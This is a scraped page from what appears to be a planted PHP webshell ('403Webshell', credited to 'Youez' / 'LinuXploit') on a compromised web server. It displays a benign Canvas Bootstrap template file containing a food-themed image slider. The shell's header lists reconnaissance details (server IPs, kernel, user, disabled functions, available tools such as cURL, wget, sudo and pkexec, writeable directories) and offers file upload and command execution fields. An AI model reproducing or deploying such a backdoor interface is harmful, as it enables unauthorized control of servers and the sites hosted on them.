403Webshell
Server IP : 104.21.21.239  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/domains/nycyouth/Package-HTML/Canvas 7 Files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/domains/nycyouth/Package-HTML/Canvas 7 Files/block-slider-6.html
<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>

	<meta http-equiv="content-type" content="text/html; charset=utf-8">
	<meta http-equiv="x-ua-compatible" content="IE=edge">
	<meta name="author" content="SemiColonWeb">
	<meta name="description" content="Get Canvas to build powerful websites easily with the Highly Customizable &amp; Best Selling Bootstrap Template, today.">

	<!-- Font Imports -->
	<link rel="preconnect" href="https://fonts.googleapis.com">
	<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&family=Lato:wght@400;500;600;700&display=swap" rel="stylesheet">

	<!-- Core Style -->
	<link rel="stylesheet" href="style.css">

	<!-- Font Icons -->
	<link rel="stylesheet" href="css/font-icons.css">

	<!-- Plugins/Components CSS -->
	<link rel="stylesheet" href="css/swiper.css">

	<!-- Custom CSS -->
	<link rel="stylesheet" href="css/custom.css">
	<meta name="viewport" content="width=device-width, initial-scale=1">

	<!-- Document Title
	============================================= -->
	<title>Slider | Canvas</title>

	<style>

		.swiper-pagination {
			bottom: 40px !important;

			--cnvs-swiper-bar-color: var(--bs-gray-300);
			--cnvs-swiper-bar-active-color: #111;
			--cnvs-swiper-bar-title-color: #222;
			--cnvs-swiper-bar-width: 140px;
			--cnvs-swiper-bar-height: 4px;
			--cnvs-swiper-bar-gap: 25px;
			--cnvs-swiper-autoplay-speed: 5000ms;
		}

		.dark .swiper-pagination {
			--cnvs-swiper-bar-color: rgba(255,255,255,0.3);
			--cnvs-swiper-bar-active-color: var(--bs-light);
			--cnvs-swiper-bar-title-color: var(--bs-light);
		}

		.swiper-container-horizontal>.swiper-pagination-bullets .swiper-pagination-bullet {
			margin-right: var(--cnvs-swiper-bar-gap);
			background: transparent !important;
		}

		.swiper-pagination span {
			position: relative;
			width: var(--cnvs-swiper-bar-width);
			height: auto;
			text-align: left;
			border-radius: 3px;
			opacity: 1;
			border: 0;
		}
		.swiper-pagination span.slider-name {
			font-size: 15px;
			line-height: 40px;
			font-weight: 400;
			color: var(--cnvs-swiper-bar-title-color);
			text-transform: capitalize;
			background: transparent !important;
		}
		.swiper-pagination span.slider-bar {
			position: absolute;
			bottom: 0;
			left: 0;
			z-index: 1;
			width: 100%;
			height: var(--cnvs-swiper-bar-height);
			background-color: var(--cnvs-swiper-bar-color);
			overflow: hidden;
			border-radius: 3px;
		}
		.swiper-pagination span.slider-bar-active {
			position: absolute;
			bottom: 0;
			left: 0;
			z-index: 2;
			width: 0%;
			border-radius: 3px;
			height: var(--cnvs-swiper-bar-height);
			background-color: var(--cnvs-swiper-bar-active-color) !important;
		}

		.swiper-pagination span:hover span.slider-bar {
			background-color: var(--cnvs-swiper-bar-color) !important;
		}

		.swiper-pagination-bullet-active {
			background-color: transparent;
		}
		.swiper-pagination-bullet-active span.slider-bar-active {
			animation-name: swiperBarAnim;
			animation-duration: var(--cnvs-swiper-autoplay-speed);
			animation-timing-function: ease-in;
			animation-iteration-count: 1;
			animation-direction: alternate;
			animation-fill-mode: forwards;
		}

		@keyframes swiperBarAnim {
			0% {
				width: 0%;
			}
			100% {
				width: 100%;
			}
		}

		.swiper-slide-active .swiper-slide-bg {
			-webkit-animation: kenburns-top 14s ease-out both;
	        animation: kenburns-top 14s ease-out both;
		}

		@keyframes kenburns-top {
		0% {
			-webkit-transform: scale(1);
					transform: scale(1);
			-webkit-transform-origin: 50% 50%;
					transform-origin: 50% 50%;
		}
		100% {
			-webkit-transform: scale(1.15);
					transform: scale(1.15);
			-webkit-transform-origin: top;
					transform-origin: top;
		}
		}

	</style>


</head>

<body class="stretched">

	<!-- Document Wrapper
	============================================= -->
	<div id="wrapper">

		<!-- Content
		============================================= -->
		<section id="content">
			<div class="content-wrap py-0">

				<!-- Hero Section
				============================================= -->
				<div class="slider-element swiper_wrapper dark min-vh-100 customjs">

					<div class="swiper-container swiper-parent">
						<div class="swiper-wrapper">
							<div class="swiper-slide">
								<div class="container">
									<div class="slider-caption">
										<h2 data-animate="fadeInUp">1. Pizza</h2>
										<p data-animate="fadeInUp" data-delay="200">Create just what you need for your Perfect Website. Choose from a wide range of Elements &amp; simply put them on our Canvas.</p>
									</div>
								</div>
								<div class="swiper-slide-bg" style="background-image: url('demos/restaurant/images/slider/1.jpg');"></div>
							</div>
							<div class="swiper-slide">
								<div class="container">
									<div class="slider-caption">
										<h2 data-animate="fadeInUp">2. Burger</h2>
										<p data-animate="fadeInUp" data-delay="200">Create just what you need for your Perfect Website. Choose from a wide range of Elements &amp; simply put them on our Canvas.</p>
									</div>
								</div>
								<div class="swiper-slide-bg" style="background-image: url('demos/burger/images/hero.jpg');"></div>
							</div>
							<div class="swiper-slide">
								<div class="container">
									<div class="slider-caption slider-caption-center">
										<h2 data-animate="fadeInUp">3. Sandwich</h2>
										<p data-animate="fadeInUp" data-delay="200">Create just what you need for your Perfect Website. Choose from a wide range of Elements &amp; simply put them on our Canvas.</p>
									</div>
								</div>
								<div class="swiper-slide-bg" style="background-image: url('demos/recipes/images/slider/1/bg.jpg');"></div>
							</div>
						</div>
						<!-- If we need pagination -->
						<div class="swiper-pagination"></div>
					</div>
				</div>

			</div>
		</section><!-- #content end -->


	</div><!-- #wrapper end -->

	<!-- Go To Top
	============================================= -->
	<div id="gotoTop" class="uil uil-angle-up"></div>

	<!-- JavaScripts
	============================================= -->
	<script src="js/jquery.js"></script>
	<script src="js/functions.js"></script>

	<script>
		window.addEventListener( 'pluginSwiperReady', () => {
			var cssVarSpeed = getComputedStyle(document.querySelector('.swiper-pagination'));
			var swiperSpeed = (cssVarSpeed.getPropertyValue('--cnvs-swiper-autoplay-speed')).split('ms');

			var listArray = ["1. Pizza","2. Burger","3. Sandwich"];

			var swiper = new Swiper('.swiper-container', {
				slidesPerView: '1',
				loop: true,
				autoplayDisableOnInteraction: false,
				autoplay: {
					delay: Number( swiperSpeed[0] )
				},
				pagination: {
					el: '.swiper-pagination',
					clickable: 'true',
					type: 'bullets',
					renderBullet: function (index, className) {
						return '<span class="' + className + '">' + '<span class="slider-name">'+ listArray[index]+'</span>' + '<span class="slider-bar"></span>' + '<span class="slider-bar-active"></span>'  + '</span>';
					},
				}
			});
		});
  </script>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit